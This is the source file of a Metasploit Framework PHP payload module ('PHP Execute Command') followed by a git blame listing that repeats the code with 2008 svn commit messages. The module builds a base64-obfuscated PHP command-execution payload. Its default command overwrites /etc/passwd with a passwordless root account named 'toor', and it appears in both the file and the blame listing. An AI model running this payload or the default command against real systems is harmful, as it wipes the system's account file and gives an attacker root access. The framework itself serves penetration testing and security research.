metasploit-framework/modules/payloads/singles/php/exec.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'
require 'msf/core/payload/php'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'


module Metasploit3

	include Msf::Payload::Single
	include Msf::Payload::Php

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'PHP Execute Command ',
			'Version'       => '$Revision$',
			'Description'   => 'Execute a single shell command',
			'Author'        => [ 'egypt <egypt@metasploit.com>' ],
			'License'       => BSD_LICENSE,
			'Platform'      => 'php',
			'Arch'          => ARCH_PHP
			))
		register_options(
			[
				OptString.new('CMD', [ true, "The command string to execute", 'echo "toor::0:0:::/bin/bash">/etc/passwd' ]),
			], self.class)
	end

	def php_exec_cmd

		cmd = Rex::Text.encode_base64(datastore['CMD'])
		dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
		shell = <<-END_OF_PHP_CODE
		$c = base64_decode("#{cmd}");
		#{php_preamble({:disabled_varname => dis})}
		#{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis})}
		END_OF_PHP_CODE
		
		return shell
	end

	#
	# Constructs the payload
	#
	def generate
		return php_exec_cmd
	end

end
add simple command execution payload for php git-svn-id: file:///home/svn/framework3/trunk@5646 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-01 04:41:18 +00:00			`##`
Set property 'svn:keywords' git-svn-id: file:///home/svn/framework3/trunk@5783 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-23 02:43:21 +00:00			`# $Id$`
add simple command execution payload for php git-svn-id: file:///home/svn/framework3/trunk@5646 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-01 04:41:18 +00:00			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/projects/Framework/`
			`##`


			`require 'msf/core'`
			`require 'msf/core/payload/php'`
			`require 'msf/core/handler/bind_tcp'`
			`require 'msf/base/sessions/command_shell'`


This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`module Metasploit3`
add simple command execution payload for php git-svn-id: file:///home/svn/framework3/trunk@5646 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-01 04:41:18 +00:00
			`include Msf::Payload::Single`
			`include Msf::Payload::Php`

			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'PHP Execute Command ',`
Set property 'svn:keywords' git-svn-id: file:///home/svn/framework3/trunk@5783 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-23 02:43:21 +00:00			`'Version' => '$Revision$',`
add simple command execution payload for php git-svn-id: file:///home/svn/framework3/trunk@5646 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-01 04:41:18 +00:00			`'Description' => 'Execute a single shell command',`
			`'Author' => [ 'egypt <egypt@metasploit.com>' ],`
			`'License' => BSD_LICENSE,`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP`
			`))`
			`register_options(`
			`[`
			`OptString.new('CMD', [ true, "The command string to execute", 'echo "toor::0:0:::/bin/bash">/etc/passwd' ]),`
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`], self.class)`
add simple command execution payload for php git-svn-id: file:///home/svn/framework3/trunk@5646 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-01 04:41:18 +00:00			`end`

			`def php_exec_cmd`

			`cmd = Rex::Text.encode_base64(datastore['CMD'])`
			`dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)`
			`shell = <<-END_OF_PHP_CODE`
			`$c = base64_decode("#{cmd}");`
			`#{php_preamble({:disabled_varname => dis})}`
			`#{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis})}`
			`END_OF_PHP_CODE`

			`return shell`
			`end`

			`#`
			`# Constructs the payload`
			`#`
			`def generate`
			`return php_exec_cmd`
			`end`

Code cleanups git-svn-id: file:///home/svn/framework3/trunk@5773 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-19 21:03:39 +00:00			`end`